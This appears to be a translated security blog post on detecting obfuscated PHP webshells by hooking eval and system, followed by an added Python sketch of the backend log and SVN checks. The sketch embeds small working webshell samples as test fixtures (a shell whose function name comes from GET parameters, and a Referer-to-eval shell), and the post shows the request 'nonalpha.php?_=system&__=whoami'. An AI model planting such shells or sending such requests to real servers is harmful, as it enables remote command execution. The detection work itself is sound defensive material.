Everyone is familiar with webshells such as eval($_POST[...]). In recent years many variants have been derived from these common webshells, which makes detection harder. Let's first take a look at several samples collected from the Internet......
I. Deformed webshells
Let's take a look at several samples collected from the Internet:
1. Webshell without letters or digits
2. Hidden keywords
3. Encoding + hidden keywords
Judging from the publicly available samples, deformed PHP webshells mostly hide the keywords (eval, system, etc.) to get past scanners. monyer wrote an article on webshell detection in which he split a webshell into the following structure: an execution part and a data-transfer part. His detection idea uses parentheses as boundaries and matches the keywords of known samples against the execution part. This is a good idea, but in my view it has two shortcomings:
1. New samples have to be collected and maintained by hand.
2. The false-positive rate cannot be estimated.
Looking at this structure, a deformed webshell does nothing more than hide its execution part or its data-transfer part. However it is deformed, it still has to call eval, system, exec or another command-execution function in the end. Anti-virus software detects trojans through abnormal behaviour, for example a program registering itself to start with the system; the same idea can be applied to webshell detection. Obtaining behaviour data is the first step.
II. PHP HOOK
Here we only need some sensitive behaviour data, such as calls to eval and system. The implementation is simple: hook these PHP functions or language constructs. Here we use a PHP extension to implement the hook. The hook method is described below using eval and system as examples.
eval is a language construct. Calling eval eventually calls the zend_compile_string function of the PHP engine, so hooking eval only requires replacing zend_compile_string (a function pointer in the engine) with our own version. The process is as follows:
system is an internal PHP function. PHP code is compiled into opcodes (instructions) for execution, and the opcode that performs a function call is ZEND_DO_FCALL (for details, see section 2). One way to hook it is to override the ZEND_DO_FCALL handler. Because we do not need to hook every internal function, another method is introduced below:
The reported data is written to a log file and includes the file name, the name of the called function, and the line number in that file. The log structure and content are as follows:
The attachment contains a demo that hooks the eval and system functions; see the code for details. The demo has only been tested on php-5.3.6; compatibility with other versions has not been checked, please bear with me.
III. Detection
Deformed webshells fall into two categories; the detection logic for each is described below.
1. Hidden execution data
A normal programmer who uses eval or system will not deliberately transform or hide the function name. So if a function was executed but its name cannot be found in the code at that point, we treat it as abnormal behaviour. Take the following deformation as an example:
For example, when an attacker requests nonalpha.php?_=system&__=whoami to execute a command, the log records:
On the backend we take line 7 of nonalpha.php and search it for the string "system". If it is not found, the file is considered a deformed webshell.
2. Hidden data transfer
Let's take a look at the following example.
This webshell receives its attack payload through an encoded Referer header. Using the file name and line number recorded in the log, the backend fetches that code and compares it with the copy in SVN; if they differ, the file is considered a webshell.
IV. Shortcomings
The web servers handle a large volume of requests, so the performance and stability of the added PHP extension are put to a severe test. In addition, for companies with many servers there is still a rollout and deployment cost.
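As an added example that is not part of the original post or its attached demo, the following Python sketches the backend side of the two checks above, working from the log layout of section II: it parses the hook log, runs the hidden-execution check from III.1 (is the function name written on the logged line?) and the SVN comparison from III.2 (does the deployed file match the committed copy?). The whitespace-separated log format, the three PHP files and their SVN copies are all constructed for this example; the post does not fix a log delimiter.

```python
"""Backend checks over the PHP hook log. Constructed example, not the post's demo."""
import hashlib
import re
from typing import Dict, List, Optional, Tuple

# Assumed log layout: "<file> <function> <line>", whitespace-separated.
# The post does not fix a delimiter, so this regex is an assumption.
LOG_LINE = re.compile(r"^(?P<file>\S+)\s+(?P<func>[A-Za-z_]\w*)\s+(?P<line>\d+)\s*$")


def parse_log(log_text: str) -> List[Tuple[str, str, int]]:
    """Turn the raw log into (file, function, line) triples; malformed lines are skipped."""
    records = []
    for raw in log_text.splitlines():
        m = LOG_LINE.match(raw.strip())
        if m:
            records.append((m.group("file"), m.group("func").lower(), int(m.group("line"))))
    return records


def execution_hidden(source: str, func: str, lineno: int) -> bool:
    """Check 1 (III.1): the hook saw `func` run at `lineno`, but the name is not
    written on that line. PHP function names are case-insensitive, so compare
    lower-cased. A line number past the end of the file we hold is also suspicious."""
    lines = source.splitlines()
    if lineno < 1 or lineno > len(lines):
        return True
    return func not in lines[lineno - 1].lower()


def differs_from_svn(deployed: str, svn_copy: Optional[str]) -> bool:
    """Check 2 (III.2): compare the deployed file with its copy in source control.
    Digests are compared so that web servers only need to report a hash, not the
    file. A file that is absent from SVN altogether is reported as well."""
    if svn_copy is None:
        return True

    def digest(text: str) -> str:
        return hashlib.sha256(text.encode("utf-8")).hexdigest()

    return digest(deployed) != digest(svn_copy)


def classify(file: str, func: str, lineno: int,
             deployed: Dict[str, str], svn: Dict[str, str]) -> str:
    """Verdict for one log record, most serious condition first."""
    source = deployed.get(file)
    if source is None:
        return "missing-file"
    if execution_hidden(source, func, lineno):
        return "hidden-execution"
    if differs_from_svn(source, svn.get(file)):
        return "modified-source"
    return "clean"


RANK = {"clean": 0, "modified-source": 1, "hidden-execution": 2, "missing-file": 2}


def scan(log_text: str, deployed: Dict[str, str], svn: Dict[str, str]) -> Dict[str, str]:
    """Run both checks on every record; each file keeps its worst verdict."""
    verdicts: Dict[str, str] = {}
    for file, func, lineno in parse_log(log_text):
        v = classify(file, func, lineno, deployed, svn)
        if file not in verdicts or RANK[v] > RANK[verdicts[file]]:
            verdicts[file] = v
    return verdicts


# Constructed hook log: three calls seen by the extension.
SAMPLE_LOG = """\
nonalpha.php system 7
referer.php eval 3
index.php system 12
"""

# Constructed stand-in for the no-letters sample: the function name is never
# written in the file, it arrives in the request (line 7 is the call).
NONALPHA_PHP = """<?php
// constructed stand-in for the non-alphanumeric sample: the function name
// is never written in the file, it arrives in the request
$_ = $_GET['_'];
$__ = $_GET['__'];
if (!function_exists($_)) exit;
$_($__);
"""
# Constructed Referer-based shell: "eval" is visible, so only the SVN diff catches it.
REFERER_PHP = "<?php\n$payload = base64_decode($_SERVER['HTTP_REFERER']);\neval($payload);\n"
REFERER_SVN = "<?php\n// referer.php as committed: a harmless stub\necho 'ok';\n"
# Constructed legitimate file: system() is written in plain sight and matches SVN.
INDEX_PHP = ("<?php\n" + "".join(f"// line {i}\n" for i in range(2, 12))
             + "system('ls ' . escapeshellarg($dir));\n")

DEPLOYED = {"nonalpha.php": NONALPHA_PHP, "referer.php": REFERER_PHP, "index.php": INDEX_PHP}
SVN = {"referer.php": REFERER_SVN, "index.php": INDEX_PHP}  # nonalpha.php was never committed

if __name__ == "__main__":
    for name, verdict in scan(SAMPLE_LOG, DEPLOYED, SVN).items():
        print(f"{name}: {verdict}")
```

Two caveats a practitioner would add: check 1 is blind when the keyword happens to appear on the same line inside a comment or string, and it flags legitimate dynamic calls such as `$handler($arg)` or call_user_func in frameworks, which is where the false positives mentioned earlier come from; check 2 assumes every deployed file is under version control, so generated or uploaded files need an allowlist.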